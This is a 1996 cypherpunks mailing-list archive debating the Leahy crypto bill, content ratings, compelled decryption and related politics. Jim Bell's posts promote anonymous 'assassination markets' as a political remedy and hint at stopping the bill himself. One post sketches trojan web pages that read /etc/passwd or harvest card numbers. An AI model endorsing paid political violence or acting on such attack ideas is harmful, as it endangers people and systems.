"Do you feel lucky?  Well, do you, PUNK?"


If there are any of you who have doubts as to the need for the 
"Assassination Politics" idea, I'd say this S.C. decision should clear them 
up but fast.  Anybody out there believe that the decision would have gone 
this way if we'd all been able to chip in and fix the problem in a few days?

Jim Bell
jimbell@pacifier.com

p.s. especially to Tim May:  If the issue wasn't so serious, and their blind 
support of this bill so obviously misguided, I wouldn't be rhetorically 
"slapping them in the face" as I'm trying to do here.  


Klaatu Burada Nikto





-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMUONFPqHVDBboB2dAQGIMQP/cQ4f7wUm3swBrXFKDgQ+QrzfrKWooDwu
0DVMIS3gRr5AOkXANjXKQmdV0U6Ug2Rf/Wtkh32S8lR+wpizvn9kg7nVhrDLHvKZ
pClRAgTFolI5FDctU6J934+XxD5xt83nw15M4yenZAtPDN8OoakMft2cDKUeqEis
apuLR5tzyTA=
=aPdf
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "A. Padgett Peterson P.E. Information Security" <PADGETT@hobbes.orl.mmc.com>
Date: Mon, 11 Mar 1996 07:53:34 +0800
To: cypherpunks@toad.com
Subject: re: PA
Message-ID: <960310184217.2020acbd@hobbes.orl.mmc.com>
MIME-Version: 1.0
Content-Type: text/plain


Tim rote:
>(By the way, I also figured out the anonymous markets for assassinations
>bit, too, in 1988, and discussed it in detail then with Eric Drexler, Marc
>Stiegler, Mark Miller, Robin Hanson, and others. 

Long enough ago that I have forgotten the citation, I read an even older
SF story about explosive necklaces worn by politicians. If their electronic
agreement percentage (and think this was in the sixties folks) dropped
too low, a vacancy occured.
						Warmly,
							Padgett

ps if you have strong principles, and stick by them, sooner or later you
   will manage to offend everyone.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Mon, 11 Mar 1996 09:55:17 +0800
To: mab@crypto.com (Matt Blaze)
Subject: Re: Lawz to be.
In-Reply-To: <199603110020.TAA22441@crypto.com>
Message-ID: <199603110105.TAA05652@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


Matt Blaze said,

> ...but based on discussions I've had with various Senate staffers,
> I'm not optimistic that it will be.

> If you feel strongly about this, I urge you to lobby your Senators
> (and representatives, since there's also a House version of the bill) and
> tell them exactly what you like and don't like about this legislation, as
> I am doing with mine.

It sounds like you're making much better contact with your representatives
than I've ever been able to make with mine.  Whenever I call or write I
have the impression that I'm just talking with a receptionist who either
does nothing with my comment or just puts it on a tally sheet of some
kind.

Do you know something about lobbying that I don't?  Or do your Senators' 
staffers know about your reputation as an expert who ought to be listened 
to?  When you call up a Senator's office, who do you ask to speak to?  
How do you find out which staffer would carry the ball on a particular 
issue?

I'm sure we'd all make the effort to lobby if we felt it was making a 
difference.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: drose@AZStarNet.com
Date: Tue, 12 Mar 1996 15:40:23 +0800
To: cypherpunks@toad.com
Subject: Cut the mystical artist crap. (No crypto relevance here)
Message-ID: <199603110209.TAA08023@web.azstarnet.com>
MIME-Version: 1.0
Content-Type: text/plain



>Was it Thoreau who said "Consistency is the hobgoblin of
>simpletons"?

Wrong, my somewhat hysterical anonymous young woman. It was Emerson who
wrote, "A foolish consistency is the hobgoblin of small minds." Please, try
Bartlett's prior to again making an ass of yourself.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Mon, 11 Mar 1996 12:59:29 +0800
To: "A. Padgett Peterson P.E. Information Security" <cypherpunks@toad.com
Subject: re: PA
Message-ID: <v02120d03ad692061e7af@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:42 PM 3/10/96, "A. Padgett Peterson P.E. Information Security"

> Long enough ago that I have forgotten the citation, I read an even older
> SF story about explosive necklaces worn by politicians. If their
>electronic
> agreement percentage (and think this was in the sixties folks) dropped
> too low, a vacancy occured.

We talked here a while back about the Gilbert & Sullivan operetta where
there was a "court exploder" or something, whose job it was to blow up the
king should the monarch become too egregious in conduct. The limiting
factor was that the "exploder", or whatever, was the person who would
inherit the king's job.

;-).

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://thumper.vmeng.com/pub/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Mon, 11 Mar 1996 08:40:22 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Lawz to be.
In-Reply-To: <m0tvqSz-00091kC@pacifier.com>
Message-ID: <199603110020.TAA22441@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain


While I don't agree with some of the conclusions you reached in your note,
I certainly agree that the Leahy bill would be better for cryptography
without this crime.  I hope that section gets further narrowed (or removed
altogether), but based on discussions I've had with various Senate staffers,
I'm not optimistic that it will be.

If you feel strongly about this, I urge you to lobby your Senators
(and representatives, since there's also a House version of the bill) and
tell them exactly what you like and don't like about this legislation, as
I am doing with mine.

-matt





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Mon, 11 Mar 1996 09:03:25 +0800
To: cypherpunks@toad.com
Subject: Re: anonymous web pages (Was: SurfWatch)
In-Reply-To: <199603100450.XAA16800@hausdorff.math.psu.edu>
Message-ID: <Pine.LNX.3.91.960310192841.2110A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 9 Mar 1996, Dan Cross wrote:
 
> This is an interesting idea, though I think a really really insecure one.
> What's keeping someone from posting ``trojan web pages'' and then waiting
> for the pages to be soaked up by servers?  Something that says ``click
> <here> to see the /etc/passwd file for this site!'' which runs some funky
> CGI thing to cat /etc/passwd or, ``Enter your credit card number to buy
> super wiz-bang gadget!'' or the like is a really scary, but very real,
> possibility if great care is not taken in setting this kind of thing up.
> News servers, on the other hand, don't suffer from this problem because
> the data which they contain is much more passive in nature (at least, while
> in the spool..) than HTML.

The obvious fix would just be to disallow the use of CGI scripts in anonymous
web pages.  In order for a file to be designated a CGI script, the must
be explicitly specified as such in the httpd configuration.  The web is
every bit as passive as Usenet.  The only difference is you can't make a
program that will execute on the NNTP server everytime it is retrieved (which
would be the Usenet equivalent of CGI).

- --Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xf9b22ba5
http://www.voicenet.com/~markm/ | bd24d08e3cbb53472054fa56002258d5
"The concept of normalcy is just a conspiracy of the majority" -me

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMUN0ybZc+sv5siulAQGlSAP+N+4Cm0PVcU3zU0WQC6O7m/JXQQJA5RuP
dF4/b1OhB8iGeT41PFZhJ/XL94KjKRwmA8TptPThaUKjbJ9feYj6ixm6LvT0xyRY
kGDKQkCF4wi3hHlVAw8ADembUw5+gQlNe3xrqnNsXPoZ5FDBpqHqQjFlPOiQhDbV
+lR85iyPbRI=
=/G3y
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@UNiX.asb.com>
Date: Mon, 11 Mar 1996 09:08:02 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: rhetorical trickery
Message-ID: <199603110043.TAA19252@UNiX.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


> all my respondents seem to be missing some basic points I have been
> trying to make about law enforcement in the US.
> 
> the law runs on proof, and evidence. a file with the name "diary.pgp"
> is not incriminating. it is not evidence. no one could be prosecuted
> as a criminal for having a diary. there is the presumption of innocence
> unless there is evidence and proof to the contrary. 

A diary isn't illegal... but if you are suspected or even convicted 
of a crime, and there's reason to believe that a book or computer 
file is a diary and that you wrote about more crimes in the diary, 
then it's worth investigating.

Just as if one is suspected of money laundering and it is known that 
that person has Swiss or Cayman Island bank accounts... having them 
doesn't mean one is guilty, but if there is other evidence that the 
crime took place then they are well within the realm of 
investigating.

> furthermore, suppose
> the "pedophile" is actually prosecuted successfully. does that mean
> the diary was incriminating? no, it does not. in the CA case it happened
[..]

No. It's just another area of potential evidence.

> that the pedophile was prosecuted without decrypting the diary. which
> in fact argues in favor of the side that says, "cryptography is not
> the end of law enforcement, and this case proves it."

One can argue that, yes. In fact I remember some LE type who was 
pro-crypto who insisted the DT Bill was for lazy cops who didn't want 
to do the footwork necessary for an investigation.

Another is when they cited the World Trade Ctr bombing... seems they 
already had a handle that it was in the works and did nothing anyway. 
DT or a crypto-ban or GAK would not have prevented that.

[..]
> now, a person might be successfully prosecuted for obstruction of
> justice, or contempt of court, in refusing to hand over the 
> decrypted diary (but the other post I made about giving the federal
> agents a key that decrypts the file to a cookie recipe handles this
> quite nicely).

And in some ways one has less rights when in contempt of court then 
when convicted of a felony....

[..]
> please, will people stop sending me responses like the above? do you
> understand how the American legal system works? a person cannot
> be prosecuted without evidence. evidence cannot be illegally obtained.
[..]

Ideally, that is how the system works.  But if they have a good 
reason to suspect something is evidence (and in the above pedaphile 
ase a file named "diary.pgp" would probably qualify) a warrant can be 
obtained.

Note that just having PGP-encrypted files would not necessarily be 
evidence either.  They pointed out a specific file with specific 
reasons why it should be examined.

> a person is not required to testify against oneself.  these are all
> basic long-established cornerstones of our legal system.

It's not clear in terms of court rulings whether handing over 
decryption keys is self-incrimination or not.  From what I have 
heard, the courts do not view safe combinations as 
self-incriminating...

> look, if someone WANTS to be put in jail for having encrypted files,
> I'm sure you can probably figure out some way to pull it off. but
> if you don't act like an idiot, such a thing is highly unlikely. it
> clearly has not happened to date.

Doesn't mean it won't...

[..]
> such deep fear around here about life in the US today? I'd say 
> that people here are high up on the list of creating the paranoia.
> be careful what you fear, you might get it.

Good point indeed. "We have nothing to fear but fear itself." (Flames 
for an FDR quote from raving anti-socialists will be bounced to 
/dev/null.)




 
Rob. 

---
Send a blank message with the subject "send pgp-key" (not in
quotes) to <WlkngOwl@unix.asb.com> for a copy of my PGP key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 12 Mar 1996 09:33:29 +0800
To: cypherpunks@toad.com
Subject: Re: Bell, Detweiler, Ravings, and Whatnot
Message-ID: <m0tvyOG-00093IC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 03:38 AM 3/10/96 -0800, Timothy C. May wrote:

>Not my "trademark," though it was my coinage (in 1987). I'm happy it's
>gaining usage, by people as diverse as David Friedman, Dorothy Denning, and
>various journalists.

Well, it's a very apt invention.

>(By the way, I also figured out the anonymous markets for assassinations
>bit, too, in 1988, and discussed it in detail then with Eric Drexler, Marc
>Stiegler, Mark Miller, Robin Hanson, and others. Several of us on the
>Extropians list discussed the implications, countersteps that might be
>taken, etc., several years ago. 

Well, until about  3/4 of a year ago, I spent no time on Internet except 
through a FIDO gateway on Libernet and Libernet-d, so I missed all that.  I'm a 
bit ashamed to admit that I haven't read the vast majority of Cybernomicon, 
although somebody was nice enough to email me a section on the  subject of 
anonymous assassination markets.  I wondered why you hadn't extended the 
idea to a more general system, but then again that was a bit early if you 
talked about it in 1988.  Without the invention of digital cash, it's a bit 
hard to reward the assassin.

>I recall incisive comments by Robin Hanson,
>David Friedman, Hal Finney, Nick Szabo, and others. And on this list, the
>topic was discussed a bit later. The archives may be helpful...though I'm
>not sure I want to help Jim Bell figure out the holes in his logic!)

You might be surprised:  There is far more to this than I've described so 
far.  I go into as much detail as a person asks, but it turns out that there 
are many more apparent "problems" that I've already solved long ago which 
have never been anticipated by anyone else, "problems" that I've never 
publicized because by the time the idea was ready for publicity, they were 
not "problems" anymore.  This disappoints me, a little, because I'd hope 
that somebody (for example, a critic) would be a more effective discoverer 
of such problems/holes.

>And your insulting comments about people whom you disagree with, or people
>whom you think are not taking your ideas seriously enough, are reminiscent
>of the ravings of the last victim here of late stage Detweiler's Syndrome.
>--Tim May

Well, maybe at times I do get a bit testy, but most recently on this Leahy 
bill I'm disgusted to see organizations that SHOULD be sounding the alarm 
actually express only mildly guarded support for that bill, "wart and all."  
I'd love to see _most_ of the bill pass, but the one bad section is a real 
killer.

Jim Bell
jimbell@pacifier.com


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMUOetPqHVDBboB2dAQEEtwP+L/TjsCr17KwjFMByi+322CCv7E/HJRp/
C0R/LC26rESzHZUawhtZGJzQ5ormn/HpEbNysygYVMs/WbE/1M+gFJK3CJcGwj1F
o/d5URKDT1M7IQNF/V5XTsYcZzz1/Cxq0zc3GQ1mtERHyicb/AwhcIXrXVkk9VVt
zvvTFMtG/so=
=kBX/
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Tue, 12 Mar 1996 15:50:36 +0800
To: cypherpunks@toad.com
Subject: Re: Cut the mystical artist crap. (No crypto relevance here)
In-Reply-To: <199603110110.CAA05830@utopia.hacktic.nl>
Message-ID: <199603110159.TAA05952@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


[...]

> What the compromises have to do with are that one lives in
> a society with rules, mores, laws.  One of those touch-shit
                                                   ~~~~~
Interesting parapraxis.

> facts of life.  You can do what you want, but when it involves
> other people, restrictions come in.  You deal with them,
> whether you are an artist, programmer, politician, goverment
> wonk, or whatever.
> 
> It has nothing to do with selling out or losing integrity.
> If you want food and shelter and you're not living in the
> woods, then you have to play by everyone else's rules if you
> don't have the power to make your own rules.
> 
> Was it Thoreau who said "Consistency is the hobgoblin of
> simpletons"?

Thoreau was the guy who went to jail rather than pay his taxes when he 
felt the government was using the money for immoral purposes.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Deranged Mutant <wlkngowl@unix.asb.com>
Date: Tue, 12 Mar 1996 06:05:28 +0800
To: JonWienke@aol.com
Subject: Re: Another Motivation for the CDA (Federal Sentencing Guid
In-Reply-To: <960310020800_242145444@emout09.mail.aol.com>
Message-ID: <31437C99.35BD@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


WARNING: The word "crypto" appears only once in this post.

JonWienke@aol.com wrote:
> What difference does that make?  If you are deranged enough to murder someone
> because they are selling crack in your territory, you are deranged enough to
> shoot your manager after getting fired from McDonalds, or to do any number of
> heinous things that ahve nothing to do with drug laws.  Sick people will
> still do sick things, even if some of them are legalized.

Did someone say "deranged"? ;)

If you're involved in the crack trade, chances are low level dealers
are supporting your habit.  Crack tends to make people deranged, and
the pressure of the competition and illegality don't do much for one's
paranoia.

The character who shoots his boss at Micky D's may well be speeded out
or coked up too.  The drugs tends to make one muy loco.

Then again, people don't see much wrong with executing criminals or
going into another country and killing off the civillians because their
petty dictator president would suck the cocks of US/European corporations
so what do you expect?  The derangement is pretty widespread in America.
You got Waco wackos hiding from black helicopters enforcing the Zionist
conspiracy to make Amerikkka part of the one-world government run by
a cabal of Jewish lesbians from the Andromeda galaxy.

I think the crackheads shooting each other on street corners are quite
down to earth in comparison.

ObCrypto: None.

--Rob




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Mon, 11 Mar 1996 13:03:00 +0800
To: "Mark M." <dlv@bwalk.dm.com>
Subject: Re: rhetorical trickery
Message-ID: <199603110412.UAA13426@dns1.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 02:36 PM 3/10/96 -0500, Mark M. wrote:
> There was an article in the July 1995 issue of Technology Review by
> Dorothy Denning explaining the "evils of encryption" in defense of the
> Clipper Chip which mentions this case.  I suspect that it actually
> happened.

Why should the fact that Dorothy Denning says something lead you to 
suspect that it actually happened?
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Mon, 11 Mar 1996 19:18:32 +0800
To: Mutant Rob <wlkngowl@unix.asb.com>
Subject: Re: Petty Civil Disobedience
Message-ID: <199603110412.UAA13449@dns1.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


jamesd@echeque.com wrote:
>> In the course of doing this, I discovered that on windows, Netscape
>> makes jpegs of naked pretty girls look like crap.

At 08:36 PM 3/10/96 -0500, Mutant Rob wrote:
> It would take much longer to process the image without dithering of
> some sort.  Displaying jpegs in high quality is CPU intensive.

You have this ass backwards.

Dithering slows it down, but is needed for quality, since they presumably 
do not wish to optimize the palette. 

The point is that they do a lousy job on dithering.  So does Microsoft
explorer.  They probably purchased the identical code from some clot.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mutant Rob <wlkngowl@unix.asb.com>
Date: Mon, 11 Mar 1996 10:11:10 +0800
To: "Harry S. Hawk" <habs@warwick.com>
Subject: Re: FCC & Internet phones
In-Reply-To: <199603101456.JAA08887@cmyk.warwick.com>
Message-ID: <31437E51.D38@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


Harry S. Hawk wrote:
[..]
> 
> Btw. the worst thing is all the phone companies are very very good
> a lobbying... congress, the FCC, etc.
> 
> ALso once FCC regulations something commmerical speach becomes "restricted."
> Eg., tobbaco ads..

Hmmm...

So any word from the EFF?  Perhaps it is time for ISPs to start their
own lobbying organization....

--Rob




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 11 Mar 1996 10:09:45 +0800
To: cypherpunks@toad.com
Subject: To: s1018954
Message-ID: <199603110114.UAA19006@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Mail to your "from" address bounces with message "insufficient 
permission." Care to check that?








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mutant Rob <wlkngowl@unix.asb.com>
Date: Mon, 11 Mar 1996 10:16:23 +0800
To: cypherpunks@toad.com
Subject: How would Leahy bill affect crypto over HAM radio?
Message-ID: <31437F04.EF1@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


Subject asks it. I'm not a HAM, but still curious. Wonder if anyone
has brought this to Leahy's attention...

Comments from the packet folx on the list?

--Rob




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Mon, 11 Mar 1996 17:48:12 +0800
To: tcmay@got.net
Subject: Re: SurfWatch
Message-ID: <01I26PWDSTX4AKTUBC@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"tcmay@got.net"  9-MAR-1996 21:00:29.15

>I plan to taper off on all responses to this thread about SurfWatch and
>ratings services. Various sides have expressed their opinions about what
>courts and governments will demand, and others respond by saying, "I
>disagree. They can pass a law..." or "I disagree. The government is
>powerless," etc.

	I can see your reasons for doing so. The discussion of how to use
ratings systems in ways not intended, so long as the government isn't able to
get in the way of doing so, is probably more interesting.

>In the terms of the lawyers--from what I picked up during my time on the
>Cyberial list--a requirement that words be rated before they can be
>distributed would not pass Constitutional muster. This does not mean that
>one's words will not trigger prosecutions, lawsuits, treason trials, etc.
>What it means is that "prior restraint" is frowned upon (recall "The
>Progressive" H-bomb case of about 15 years ago, where a court subjected
>this magazine to prior restraint...a rare occurrence, later overturned. A
>more recent case involves "Business Week," and is still unresolved).

	I may check with a lawyer myself on this issue. I had known that
prior restraint, as in restraining something from being published at all, was
considered unconstitutional by all but the nut-case authoritarians. But I had
thought that the question of rating was still up in the air - the TV industry
seems to have decided not to fight the V-chip in court, for instance. Since
the government seems to have decided that it can remove "indecent" material,
as judged by them, from the purview of minors, it could argue that a mandated
rating system is the "least restrictive" way to do so - ignoring that others
can use it for further restrictions.

>By the way, who does the rating in this scenario? As others have also
>noted, if I am rating my own pages, and rate them as "suitable for all
>ages," but Jesse Helms disagrees, what charges can be filed? That I was not
>a good enough judge of the material? That my opinions differed from Senator
>Helms'?

	Well, I and Senator Helms have differing views on what is "obscene"
and what isn't - and a court is more likely to go with his (prevailing
community norms and all that nonsense) in deciding whether to prosecute me.


>"Voluntary self-rating" runs into problems, such as this example. One is
>left with ratings by _others_, e.g.. ratings boards, and even then there
>are variations of this same problem. The "Lesbian Alliance" is going to
>have different ideas of what children should be exposed to than the
>"Christian Crusade" will ideas about. Who is right? ("What is truth?")

	There's also the lawsuit issue. If somebody decides that I haven't
rated my words high enough to keep "indecent" material from their children,
they may sue - and "community norms" will be used to decide.

>>        D. The government in a country such as China uses rating systems to
>>help them filter.

>Doesn't have much to do with _my_ words or pages. It ain't the business of
>the U.S. court system--which is what we're talking about here--to worry
>about what some Maoists think is proper for young cadres to read.

	I was discussing what was ethical for the proponents of rating systems
to do, not what they should be _allowed_ to do. In other words, I am in favor
of allowing anyone who wishes to create a rating system, just as I am in favor
of allowing anyone who wishes to talk a bunch of utter trash about Holocaust
Revisionism. But I wish to discourage people from doing either (or at least in
the first case from creating systems that can be misused in such an obvious
fashion).

>I disagree with the overall conclusions of this line of reasoning. (Though
>the "children are not the property of their parents" point is heavy
>phrasing, and hard to take issue with directly, due to the language.)

	I use it as the anarcho-capitalists do who claim that taxation is
theft. It gets the attention. I am angered by modern trends in favor of
_either_ parental (parents deciding their kids shouldn't learn about evolution,
or about sex) or societal (curfews et al). I am also angered by cases like the
Joey Buttafuocco (sp?) one, in which he was convicted for having sex with a
(definitely willing) minor who was decided to be sufficiently competent to
be tried as an adult for committing murder. I had a set of decidedly
overprotective parents myself, and I can trace lots of psychological damage
from that. They did it out of love, but sometimes that just doesn't work.

>In any case, while children are not for their parents to do with as they
>please, a reasonable Schelling point has been that I will not force other
>parents to expose their children to the teachings of Cthulhu if they will
>not demand that my children sit through propaganda tapes about the joys of
>homosexual sex. The status of children in a free society is a thorny issue,
>but I reject the increasingly-prevalent notion that society knows what's
>best and the government will decide what influences can be used with
>children. A society which takes away this parental choice is a terrible
>society.

	I tend to conclude that neither parents nor "society" should have any
more reign over their children than absolutely necessary. Parents have certain
rights over their children which derive from their responsibilities over those
children - i.e., to keep those children safe, get them educated so they can
have freedoms like speech and press, et al. If the parent can't clearly show
that the intervention into the child's life isn't necessary for that
responsibility to be fulfilled, then the parent shouldn't be able to do that
intervention any more than I should be able to claim that the CO2 being put
out by a factory is harming me, and should be stopped, without a lot of
evidence otherwise.


>I see much of the debate about violence and sex in society and in the media
>as being this kind of "battle for the hearts and minds" of children. I
>don't want some sociologist telling me that "Terminator II" is "bad" for my
>child but that "The Story of O" should be mandatory for my 11-year-old to
>watch.

	I agree about the "mandatory" part; I simply want to make it an option
for that child - not an option for the parent.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Mon, 11 Mar 1996 18:03:44 +0800
To: tcmay@got.net
Subject: Re: Cryptanalysis
Message-ID: <01I26QA8KE9UAKTUBC@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From: tcmay@got.net (Timothy C. May)

>The usual: Kahn, Denning, and some of the old Dover Press books on crypto.
>Also, Herbert Zim wrote a nice little book about 40-50 years ago on codes.
>Some of the standard crypto textbooks will of course have more pointers to
>cryptanalysis. (Not to sound harsh to Allen, but why would anyone ask here
>on the list for recommendations to such a standard subject when Schneier,
>Garfinkel, Denning, etc. all have books listed?)

	Thanks, I'll check. I don't happen to _have_ a copy of Applied
Cryptography, etcetera, immediately available, and I had gotten the impression
that those concentrated on cyphers as opposed to codes.

>And there are so many interesting areas to pursue with using and furthering
>modern crypto, that I just can't understand how people can think that
>classical cryptanalysis is useful. It might be fun, as a hobby, but it has
>no bearing on modern systems. (Well, I'm exaggerating a bit. I suspect that
>classical cryptanalysts at the NSA or GCHQ might have some insights into
>some problems with modern systems, such as traffic analysis. So I shouldn't
>say there is "no use" for it. But I hope you all understand my point in
>general. It is unlikely in the extreme that anyone who fools around a
>little with classical cryptanalysis will have anything important to
>contribute as a result of this.)

	I never said I was interested in putting stuff about codes into
practical usage. Actually, I'm a roleplaying gamer, and I wanted the info for
historical settings. True codes appear to be the historical equivalent of OTPs.
	-Allen 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 11 Mar 1996 14:40:32 +0800
To: Matt Blaze <mab@crypto.com>
Subject: Re: Lawz to be.
Message-ID: <m0tvzHH-0008z4C@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 07:20 PM 3/10/96 -0500, Matt Blaze wrote:
>While I don't agree with some of the conclusions you reached in your note,

By now you should have seen my most recent item, an editorial by George
Will.  The case he describes should make it clear to you that the abuse of
property owned by an "innocent victim" does not protect that person from
confiscation of his property.  Or did you think it would?

>I certainly agree that the Leahy bill would be better for cryptography
>without this crime.  I hope that section gets further narrowed (or removed
>altogether), but based on discussions I've had with various Senate staffers,
>I'm not optimistic that it will be.

Okay, here are some questions you should be asking them:

1.  Why was this one highly negative section added to what is otherwise 
apparently a good bill?  Whose fingerprints are on it?

2.  "All" bills can be amended.  "Why not this section?!?"

3.  "Why is this section so ambiguous?"

4.  What crimes, EXACTLY, do you intend to prosecute using this section?

5.  Can you list any examples of REAL incidents that have already occurred 
that would be in violation of this section if it were already in law?  
(Surely they know of some, right?!?)  If they can think of no such examples, 
ask them why they are putting a "useless provision" into a law and why is it 
so important that it be there that we can't have it removed.

6.  And finally, "what are you guys afraid of?"


>If you feel strongly about this,

You don't know how strongly I feel about this.  

> I urge you to lobby your Senators
>(and representatives, since there's also a House version of the bill) and
>tell them exactly what you like and don't like about this legislation, as
>I am doing with mine.
>-matt

If that is all that I was planning to do to stop this bill, I would consider 
myself to be a slacker.

Jim Bell
jimbell@pacifier.com

Klaatu Burada Nikto...   Which should stop this damn bill if you guys don't.



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMUOtKfqHVDBboB2dAQGDKwQAm5rQbtAdaIByJGRKYW3KlxsNGGTKzuB6
U75G5KF8TgIuJKICrkGRjwG0/vnZo8kGuA9N1oCzwqQpTN4swMoOi26e8t/7DPim
ZU3V4xGj9sUlopBBcN0pC8ksUC5ADB1K54nDfmbfEee0tL6GxstTgLKepIH2yC1j
D7/2UGFbHnc=
=vU5b
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Mon, 11 Mar 1996 17:52:17 +0800
To: erc@dal1820.computek.net (Ed Carp)
Subject: Re: Explosives, Criminality, and Preemptive Action
In-Reply-To: <Pine.3.89.9603101147.B17656-0100000@dal1820.computek.net>
Message-ID: <199603110136.UAA00547@nrk.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> It is quite common to find ammonium nitrate fertilizer and diesel fuel on
> a farm, as well as blasting caps, dynamite, gasoline, soap, and a host of
> other things that could be used to make a bomb.  When non-country folks
> bring it up, my most common reaction is, "so?" 

More importantly, USDA gives out book on how to blow up stumps with the
stuff....

-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mutant Rob <wlkngowl@unix.asb.com>
Date: Tue, 12 Mar 1996 15:47:22 +0800
To: jamesd@echeque.com
Subject: Re: Petty Civil Disobedience
In-Reply-To: <199603101719.JAA02292@dns1.noc.best.net>
Message-ID: <31438397.4FFD@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


WARNING: the word "crypto" does not appear in this post (aside from the
	this warning message).

jamesd@echeque.com wrote:
> I have added a pornographic image to my web site as an act of
> real civil disobedience.  I urge others to do the same.

Yawn.

I'd would not call it pornographic. Indecent (legalise), yeah. Porn?
No.  Don't make the same erroneous distinctions that the pro-CDA folx
make...

> In the course of doing this, I discovered that on windows, Netscape
> makes jpegs of naked pretty girls look like crap.

It would take much longer to process the image without dithering of
some sort.  Displaying jpegs in high quality is CPU intensive.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ed Carp <erc@dal1820.computek.net>
Date: Mon, 11 Mar 1996 15:32:29 +0800
To: David Lesher <wb8foz@nrk.com>
Subject: Re: How would Leahy bill affect crypto over HAM radio?
In-Reply-To: <199603110226.VAA00697@nrk.com>
Message-ID: <Pine.3.89.9603102037.A3681-0100000@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 10 Mar 1996, David Lesher wrote:

> > 
> > Subject asks it. I'm not a HAM, but still curious. Wonder if anyone
> > has brought this to Leahy's attention...
> > 
> > Comments from the packet folx on the list?
> 
> Non-cleartext has been forbidden for last 60 years anyhow.

Not quite.  Anything intended to hide the meaning of the message is 
banned.  Compression isn't banned, because the intention is to make more 
efficient use of the frequency, not to hide the meaning.
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
